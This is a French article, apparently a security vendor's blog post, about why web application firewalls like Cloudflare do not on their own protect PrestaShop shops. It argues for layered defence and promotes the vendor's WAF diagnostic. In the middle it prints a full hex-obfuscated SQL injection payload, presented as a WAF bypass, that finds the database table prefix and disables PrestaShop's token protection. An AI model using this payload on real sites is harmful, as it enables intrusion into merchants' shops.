Dans le domaine de la cybersécurité applicative qui vise à éviter d'avoir un PrestaShop piraté, il existe une grande disparité entre le sentiment de sécurité procuré par certaines solutions et la protection réelle qu'elles offrent.
Trop souvent, les entreprises se reposent sur des dispositifs réputés – tels que les Web Application Firewall (WAF - parefeu applicatif) – en pensant que leur simple présence suffit à bloquer les attaques. Or, ce sentiment de sécurité peut s'avérer être l'ennemi de la vraie protection.
Les WAF sont fréquemment perçus comme la première ligne de défense pour protéger PrestaShop et Magento contre des attaques telles que les injections SQL, le Cross-Site Scripting (XSS) ou encore les tentatives d'exploitation de vulnérabilités connues.
Ce sentiment rassurant peut amener les équipes à se reposer sur ces dispositifs et à négliger d'autres aspects essentiels de la protection, notamment :
Plusieurs facteurs limitent l'efficacité des WAF :
Offre gratuite :
Cloudflare ne vous protège pas ou très mal des piratages qui visent directement PrestaShop sur son offre gratuite. Il vous protège majoritairement contre les saturations de service (DDoS) et les robots malveillants.
S'il n'y a aucun débat sur le fait que c'est l'un des meilleurs anti-DDoS de la planète compte tenu de ses capacités. Depuis 2023, ce type d'attaque n'est plus considéré comme la menace la plus dangereuse pour votre projet.
💰 Offre payante :
Même avec l'offre payante, il faut investir plusieurs centaines d'heures pour que la solution soit réellement efficace contre les menaces professionnelles, en particulier pour les marchands générant plus d'un million d'euros de chiffre d'affaires annuel (souvent marchand de niveau 3 au regard de la PCI DSS).
🔒 Limitations :
Sans personnalisation, Cloudflare ne protège pas nativement contre les fuites de données (nom de code CWE 200 et CWE 359), qui restent hors de son périmètre. La protection se limite principalement à la défense contre les malwares, et uniquement si les niveaux de sécurité les plus avancés sont activés.
Voici un exemple d'attaque en variante hexadécimale, mal gérée par Cloudflare. Cet exemple permet d'exploiter une vulnérabilité de type INJECTION SQL et d'auto-déterminer le préfixe aléatoire de la base de données afin de maximiser l'impact sur le système :
SET%20%40a%20%3D%20uNHEx%28534554204063203d20434f4E434154282755504441544520272c202853454C45435420434F4E434154282873656C656374206C656674287461626C655F6E616D65202C204C4F434154452827636F6E66696775726174696F6E272C207461626C655F6E616D65292D31292066726F6D20696E666F726D6174696F6E5F736368656D612E7461626C6573207768657265207461626C655F736368656D61203D202873656C65637420646174616261736528292920616E64207461626C655F6E616D65206C696B65202725636F6E66696775726174696F6E27204F52444552204259204C454E475448287461626C655F6E616D652920415343204C494D4954202031292C2027636F6E66696775726174696F6E2729292C2027205345542076616C75653D30205748455245206E616D653D2250535F544F4B454E5F454E41424C45222729%29%3B%20PREPARE%20stmt%20FROM%20%40a%3B%20exECUTe%20stmt%3B%20PrEPare%20stmt2%20FroM%20%40c%3B%20exECUTe%20stmt2%3B
Cet exemple illustre que, lorsqu'ils sont déployés de manière purement automatisée et sans personnalisation approfondie, les WAF restent vulnérables. Ils ne peuvent pas gérer les règles nécessitant des ajustements spécifiques pour chaque projet, se transformant ainsi en véritables passoires pour des pirates professionnels.
✅ Cela démontre l'importance de combiner des solutions automatisées avec une surveillance humaine et des ajustements personnalisés pour garantir une vraie sécurité.
Cloudflare agit comme un intermédiaire entre un pirate et votre PrestaShop.
Lorsqu'un pirate attaque votre PrestaShop, la connexion est établie depuis Cloudflare – vous ne voyez donc pas directement l'adresse de l'attaquant, mais uniquement celle de Cloudflare.
Cloudflare vous fournit l'adresse du pirate via des en-têtes HTTP (headers), dont l'exploitation professionnelle nécessite des compétences avancées.
Le pirate sait que vous ne pouvez pas expulser Cloudflare "simplement" si vous ne respectez pas leur préconisation, et il en profite. Expulser Cloudflare signifierait un arrêt complet de l'ensemble de votre trafic, y compris celui des visiteurs légitimes.
Même si une solution via API existe pour demander à Cloudflare de bannir l'attaquant, son utilisation n'est ni obligatoire ni systématique.
Par conséquent, en l'absence d'un mécanisme efficace permettant de bloquer l'attaquant via l'API de Cloudflare, ce dernier peut exploiter cette faille pour inonder le service de milliers de requêtes malveillantes, compromettant ainsi complètement la sécurité du PrestaShop ciblé.
Pour transformer le sentiment de sécurité en une protection réellement efficace, il est essentiel d'adopter une stratégie multi-couches :
Si l'installation d'un WAF ou l'abonnement à une solution comme Cloudflare peut contribuer à créer un sentiment de sécurité, ces dispositifs ne garantissent pas, sans effort et personnalisation, une protection complète contre les cyberattaques.
La vraie sécurité repose sur une approche intégrée, multi-couches et évolutive, combinant audits réguliers, surveillance active, mises à jour constantes et formation continue.
Seule une stratégie globale permet de transformer un sentiment de sécurité en une protection solide et durable face aux menaces actuelles.
Nous vous encourageons à réaliser un diagnostic de votre WAF - notre diagnostiqueur peut vous aider.